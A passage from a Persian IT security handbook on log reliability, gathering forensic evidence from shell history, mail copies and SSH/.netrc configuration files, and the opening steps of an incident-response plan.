‫ﭘﻴﺎﻣﻬﺎﻱ ﺧﺴﺘﻪﻛﻨﻨﺪﻩ ﺭﺍ ﺑﺎ ﺩﻗﺖ ﺩﺭ ﺗﻄﺒﻴﻖ ﺍﻟﮕﻮ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻏﺮﺑﺎﻝ ﻛﻨﺪ‪ ،‬ﻭ ﺑﻘﻴﻪ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺑﻪ ﺷـﻤﺎ ﺑـﺴﭙﺎﺭﺩ‪ .‬ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺑﺎﻳـﺪ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﻧﺘﺨﺎﺏﻧﺸﺪﻩ ﺭﺍ ﻧﻴﺰ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻡ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ ﭘﻴﺎﻣﻬـﺎ‪ ،‬ﻣﻄﻠـﺐ ﻣﻬﻤـﻲ ﺭﺍ ﺍﺯ ﺩﺳـﺖ‬
‫ﻧﻤﻲﺩﻫﻴﺪ‪.‬‬

‫ﺍﻋﺘﻤﺎﺩ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﻳﺎ ﺣﺬﻑ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﻪ ﺛﺒﺘﻬﺎ ﺑﻄﻮﺭ ﻣﻄﻠﻖ ﺍﻋﺘﻤﺎﺩ ﻧﻜﻨﻴﺪ‪ .‬ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻲ ﺩﺍﺭﺍﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻳﺎ ﺩﺍﻧﺶ ﻛﺎﻓﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻜﺎﻧﻴﺰﻡ ﺛﺒﺖ ﺭﺍ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩ ﮐﺮﺩﻥ ﺷﻤﺎ ﺩﺳﺘﮑﺎﺭﻱ ﻛﻨﻨﺪ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠ ﹺ‬
‫ﻳﺎ ﺩﻭﺭ ﺑﺰﻧﻨﺪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺧﻄﺎﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﺳﻴﺴﺘﻤﻲ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻋﺪﻡ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺫﺧﻴﺮﺓ ﺻﺤﻴﺢ ﺛﺒﺘﻬﺎ ﺷـﻮﻧﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺛﺒﺖ ﻭ ﭘﻮﻳﺶ ﺍﺿﺎﻓﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ :‬ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪﺍﻱ ﺛﺒﺖ ﻧﺸﺪﻩ ﺩﻟﻴﻞ ﺑﺮ ﺁﻥ ﻧﻴﺴﺖ ﻛﻪ ﺍﺗﻔﺎﻕ ﻧﻴﻔﺘﺎﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺛﺒﺖ ﺷﺪﻥ ﻳﻚ ﻣﺴﺌﻠﻪ ﻫﻢ ﻟﺰﻭﻣﹰﺎ ﺑﻪ ﻣﻌﻨﻲ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻧﺶ ﻧﻴﺴﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﻧﻜﺘﻪﺍﻱ ﺩﺭ ﺛﺒﺘﻬﺎ ﻗﺮﺍﺭ ﺩﻫﺪ ﺗﺎ ﺷـﻤﺎ ﺭﺍ‬
‫ﺍﺯ ﻣﺸﻜﻞ ﺍﺻﻠﻲ ﺩﻭﺭ ﻛﻨﺪ ﻳﺎ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻈﺎﻥ ﺍﺗﻬﺎﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬

‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ‬
‫ﺑﻴﺸﺘﺮ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺛﺒﺖ‪ ،‬ﺁﮔﺎﻫﺎﻧﻪ ﻭ ﺑﺎ ﺗﺼﻤﻴﻢ ﻳﻚ ﻃﺮﺍﺡ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺩﺭ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻭﻟﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﺭﺣﺎﻝ‬
‫ﺍﺟﺮﺍ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺭﺍ ﻧﻴﺰ ﺛﺒﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﮔﺮﺍﻳﺶ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺟﺮﻣـﺸﻨﺎﺳﻲ ﺭﺍﻳﺎﻧـﻪﺍﻱ ‪ -‬ﻫﻨـﺮ ﺧﻮﺍﻧـﺪﻥ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺭﺩﭘﺎﻫﺎﻱ ﺑﻪ ﺟﺎ ﻣﺎﻧﺪﻩ ﺍﺯ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﭘﻴﺪﺍ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٣٠‬‬

‫ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﺑﺘﺪﺍ ﻭﺍﺿﺢ ﺑﻪ ﻧﻈﺮ ﻧﻴﺎﻳﺪ‪ ،‬ﻭﻟﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺗﻔﺎﻕ ﻧﺎﮔﻮﺍﺭﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﻣﻲﺍﻓﺘﺪ‪ ،‬ﺑﺮﺧﻲ ﻓﺎﻳﻠﻬﺎ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ‬
‫ﻫﺮ ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺟﺪﺍﮔﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﺩﺭ ﺍﻧﺠﺎﻡ ﺗﺤﻠﻴﻠﻬﺎ ﻛﻤﻚ ﺑﻴﺸﺘﺮﻱ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻭﺍﻗﻊ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻭﺍﻗﻌـﻲ‬
‫ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻳﻚ ﻣﻨﺒﻊ ﻣﻔﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﻓﺘﺎﺭ ﻛﺎﺭﺑﺮ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬

‫ﺳﻮﺍﺑﻖ ﺩﺳﺘﻮﺭﺍﺕ ﭘﻮﺳﺘﻪ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﻮﺳﺘﻪﻫﺎﻱ ﺩﺳﺘﻮﺭﻱ‪ ٣٣٩‬ﺩﺭ ‪ Unix‬ﺍﺯ ﺟﻤﻠﻪ ‪ tcsh ،csh ،bash‬ﻭ ‪ ksh‬ﻳﻚ ﻓﺎﻳﻞ ﺳﺎﺑﻘﻪ‪) ٣٤٠‬ﻳﺎ ﺗﺎﺭﻳﺨﭽﻪ( ﺩﺍﺭﻧﺪ‪ .‬ﻭﻗﺘﻲ ﻛـﺎﺭﺑﺮ‬
‫ﺩﺳﺘﻮﺭﻱ ﻭﺍﺭﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﺘﻦ ﺩﺳﺘﻮﺭ ﺑﻪ ﻫﻤﺮﺍﻩ ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻳﺶ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻣﺠﺪﺩ ﺩﺭ ﺁﻳﻨﺪﻩ ﺩﺭ ﺍﻳﻦ ﻓﺎﻳﻞ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺳـﻌﻲ‬
‫ﺩﺍﺭﻳﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺩﺭ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺎﺯﺳﺎﺯﻱ ﻛﻨﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ ﻓﺎﻳﻞ ﺭﺍ ﺩﺭ ﻛﻨـﺎﺭ ﺛﺒﺘﻬـﺎﻱ ﺳﻴـﺴﺘﻢ ﻗـﺮﺍﺭ‬
‫ﺩﻫﻴﺪ‪ .‬ﺑﺎﻳﺪ ﺯﻣﺎﻧﻬﺎﻱ ﺗﻐﻴﻴﺮﺍﺕ ﺍﻳﻦ ﻓﺎﻳﻞ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﻣﺸﻜﻮﻙ ﻓﻌﺎﻝ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺍﻳـﻦ ﻓﺎﻳـﻞ‬
‫ﺩﺭ ﺯﻣﺎﻥ ﻓﻌﺎﻟﻴﺖ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻭ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺳﺘﻮﺭﺍﺕ ﺍﺟﺮﺍ ﺷﺪﻩ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻣﭙﺎﻳﻞ ﺷﺪﻩ‪ ،‬ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺣﺘـﻲ‬
‫ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺭﮔﻴﺮ ﺩﺭ ﺭﺧﺪﺍﺩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ‪ .‬ﺳﻌﻲ ﮐﻨﻴﺪ ﺣﺴﺎﺏ ﻳﺎ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﻫﺪﻑ ﺍﻳﻦ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ ﺭﺍ‬
‫ﺑﻴﺎﺑﻴﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺑﻪ ﻧﻘﺾ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺣﺴﺎﺑﻬﺎ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺴﻠﻤﹰﺎ ﻳﻚ ﻣﻬﺎﺟﻢ ﺁﮔﺎﻩ‪ ،‬ﻗﺒﻞ ﺍﺯ ﺧﺮﻭﺝ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﻳﻦ ﻓﺎﻳﻞ ﺭﺍ ﺣﺬﻑ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺤﺘﻮﻳـﺎﺕ ﺍﻳـﻦ ﻓﺎﻳـﻞ‬
‫ﻣﻄﻠﻊ ﺷﺪ‪ :‬ﻳﺎ ﺑﺎ ﺍﺟﺒﺎﺭ ﻣﻬﺎﺟﻢ ﺑﻪ ﺧﺮﻭﺝ؛ ﺍﻳﺠﺎﺩ ﻳﻚ ﭘﻴﻮﻧﺪ ﺳﺨﺖ ﺑﻪ ﻓﺎﻳﻞ ﺩﺭ ﺟﺎﻳﻲ ﺩﻳﮕﺮ )ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳـﻞ( ﻗﺒﻞ ﺍﺯ ﺧﺮﻭﺝ ﻣﻬﺎﺟﻢ‪ ،‬ﻭ ﻳـﺎ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺣﺬﻑ ﺷﺪﻩ‪.‬‬

‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺑﺮﺧﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﻧﺎﻣﻪﻫﺎﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﻧﮕﻪ ﻣـﻲﺩﺍﺭﻧـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﻣﻬﺎﺟﻢ ﺍﺯ ﭼﻨﻴﻦ ﺣﺴﺎﺑﻲ ﻧﺎﻣﻪ ﺑﻔﺮﺳﺘﺪ‪ ،‬ﺑﺮﺭﺳﻲ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲﺍﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻋﺎﺕ ﻣﻔﻴـﺪﻱ ﺑﺪﻫـﺪ‪ .‬ﺣـﺪﺍﻗﻞ ﺩﺭ‬
‫ﻳﻚ ﻣﻮﺭﺩ ﮔﺰﺍﺭﺵﺷﺪﻩ‪ ،‬ﻳﻜﻨﻔﺮ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺴﺮﻭﻗﺔ ﻫﻤﻜﺎﺭﺵ ﻣﻲﺩﺯﺩﻳﺪ‪ ،‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻟﻮ ﺭﻓـﺖ ﻛـﻪ‬
‫ﺩﺭ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻌﻠﻮﻡ ﺷﺪ ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻲﻓﺮﺳﺘﺎﺩﻩ ﺭﺍ ﺑﺎ ﻧﺎﻡ ﺧﻮﺩﺵ ﺍﻣﻀﺎ ﻣﻲﻛﺮﺩﻩ ﺍﺳﺖ!‬

‫ﺗﻨﻈﻴﻤﺎﺕ ﺷﺒﻜﻪ‬
‫ﺣﺴﺎﺏ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﭼﻨﺪﻳﻦ ﻓﺎﻳﻞ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺒﻜﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣﻴـﺎﻧﺒﺮ‪ ٣٤١‬ﺑـﺮﺍﻱ ﺻـﺪﻭﺭ‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﻳﺎ ﺍﻋﻤﺎﻝ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺍﻃﻼﻋﺎﺕ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺮﻧﺨﻲ ﺑﺎﺷﺪ ﺑـﺮﺍﻱ ﺭﺩﮔﻴـﺮﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﻳﻚ ﺗﺒﻬﻜﺎﺭ‪ .‬ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ‪ Unix‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ‪ .ssh/known_hosts ، .rhosts‬ﻭ ‪ .ssh/authorized_keys‬ﺑﺮﺍﻱ‬
‫ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭ ﻓﺎﻳﻞ ‪ .netrc‬ﺑﺮﺍﻱ ‪ .FTP‬ﺩﺭ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺳﺮﻧﺦ ﺑﮕﺮﺩﻳﺪ‪ ،‬ﻭﻟﻲ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺑﻮﻁ ﺑﻪ ﻗﺒﻞ ﺍﺯ ﺣﻤﻠﻪ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩ ﻛﺮﺩﻥ ﺷﻤﺎ ﺩﺭ ﺁﻧﺠﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﺭﺳﻴﺪﮔﻲ ﺑﻪ ﻧﻔﻮﺫ‬
‫ﺷﻤﺎ ﺑﺎﻳﺪ ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺑﻄﻮﺭ ﺍﻋﻢ‪ ،‬ﻫﻤﺔ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ‬
‫ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﭼﻨﻴﻦ ﻃﺮﺣﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻣﺆﻟﻔﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻦ ﻃﺮﺡ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬

‫‪339 Command Shells‬‬


‫‪340 History File‬‬
‫‪341 Shortcut‬‬
‫‪٤٣١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﺆﻟﻔﺔ ‪ :١‬ﻣﺸﻜﻞ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻭ ﺑﺎ ﺁﻥ ﺁﺷﻨﺎ ﺷﻮﻳﺪ‬


‫ﻣﻀﻄﺮﺏ ﻧﺸﻮﻳﺪ ﻭ ﺑﺪﻭﻥ ﻓﻜﺮ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻧﺪﻫﻴﺪ‪ .‬ﺍﮔﺮ ﻧﺪﺍﻧﻴﺪ ﻣﺸﻜﻞ ﭼﻴﺴﺖ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﻗﺪﺍﻣﻲ ﺑﺮﺍﻱ ﺭﻓﻊ ﺁﻥ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ .‬ﺍﻳﻦ ﻣﺆﻟﻔﻪ ﺑـﻪ‬
‫ﺍﻳﻦ ﻣﻌﻨﻲ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎﻳﺪ ﺩﺭﻙ ﺑﻲﻧﻘﺼﻲ ﺍﺯ ﻣﺴﺌﻠﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﻭﻟﻲ ﺣﺪﺍﻗﻞ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻴﺪ ﺑﺎ ﭼﻪ ﺷﻜﻠﻲ ﺍﺯ ﻣﺸﻜﻞ ﺭﻭﺑﺮﻭ ﻫـﺴﺘﻴﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﺍﮔﺮ ﻣﺸﻜﻞ ﻧﺎﺷﻲ ﺍﺯ ﺍﻧﺘﻘﺎﻣﺠﻮﻳﻲ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﮐﻴﻔﻲ ﺩﺭ ﺩﻓﺘﺮ ﻫﻤﻜﺎﺭﺗـﺎﻥ ﭘﻨﻬـﺎﻥ ﺷـﺪﻩ ﺍﺳـﺖ‪ ،‬ﻗﻄـﻊ ﺍﺗـﺼﺎﻝ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻛﻤﻜﻲ ﺑﻪ ﺭﻓﻊ ﺁﻥ ﻧﻤﻲﻛﻨﺪ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٢‬ﻣﺴﺘﻨﺪﺳﺎﺯﻱ ﻛﻨﻴﺪ‬


‫ﭼﻪ ﻫﺪﻓﺘﺎﻥ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻫﺮﭼﻪ ﺳﺮﻳﻌﺘﺮ ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ ﻭ ﭼﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺭﻙ ﺑﺮﺍﻱ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺍﻳﻦ ﻣﺆﻟﻔﻪ ﻧﺘﻴﺠـﺔ‬
‫ﺑﻬﺘﺮﻱ ﻣﻲﮔﻴﺮﻳﺪ‪ .‬ﺑﻼﻓﺎﺻﻠﻪ ﺷﺮﻭﻉ ﺑﻪ ﺛﺒﺖ ﻛﺎﻏﺬﻱ ﻛﻨﻴﺪ ﻭ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ﺭﺍ ﻣﺴﺘﻨﺪ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻳـﻚ ﺩﻓﺘﺮﭼـﻪ ﺑﺮﺩﺍﺭﻳـﺪ ﻭ ﻫـﺮ‬
‫ﺳﺮﻧﺨﻲ ﻛﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﺎ ﺫﻛﺮ ﺗﺎﺭﻳﺦ ﻭ ﺳﺎﻋﺖ‪ ،‬ﻳﺎﺩﺩﺍﺷﺖ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺘﻨﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﭼﺎﭖ ﻧﻤﺎﻳﻴﺪ‬
‫ﻭ ﺭﻭﻱ ﻫﺮ ﺑﺮﮒ ﺁﻥ ﺗﺎﺭﻳﺦ ﻭ ﺍﻣﻀﺎ ﺑﺰﻧﻴﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮒ ﻳﻚ ﻣﺄﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﻳﺎ ﻳﻚ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺩﺍﺧﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛـﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺭﺳـﻴﺪﮔﻲ ﺑـﻪ ﻧﻔﻮﺫﻫـﺎ‪ ،‬ﻣﻬـﺎﺭ‬
‫ﺧﺴﺎﺭﺗﻬﺎ‪ ،‬ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﻭﺍﻛﻨﺸﻬﺎ ﺑﺮ ﻋﻬﺪﺓ ﺁﻧﻬﺎ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺩﺍﺭﺍﻱ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺑﺮﺍﻱ ﮔﺰﺍﺭﺵ ﻭﻗﺎﻳﻊ ﺩﺍﺧﻠﻲ ﺍﺳـﺖ‪ ،‬ﻣﻄﻤـﺌﻦ‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺍﻓﺮﺍﺩ ﻣﺴﺌﻮﻝ ﻫﻤﻮﺍﺭﻩ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﺑﺘﺪﺍﻳﻲ ﺣﻀﻮﺭ ﺩﺍﺭﻧﺪ ﻭ ﻋﻼﻭﻩ ﺑﺮ ﺗﺪﻭﻳﻦ ﮔﺎﻣﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ‪ ،‬ﺩﺭ ﻣﺴﺘﻨﺪﺳﺎﺯﻱ ﻧﻴﺰ ﻛﻤـﻚ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﻣﺆﻟﻔﺔ ‪ :٣‬ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﻣﺘﻮﻗﻒ ﻳﺎ ﻣﻬﺎﺭ ﻛﻨﻴﺪ‬


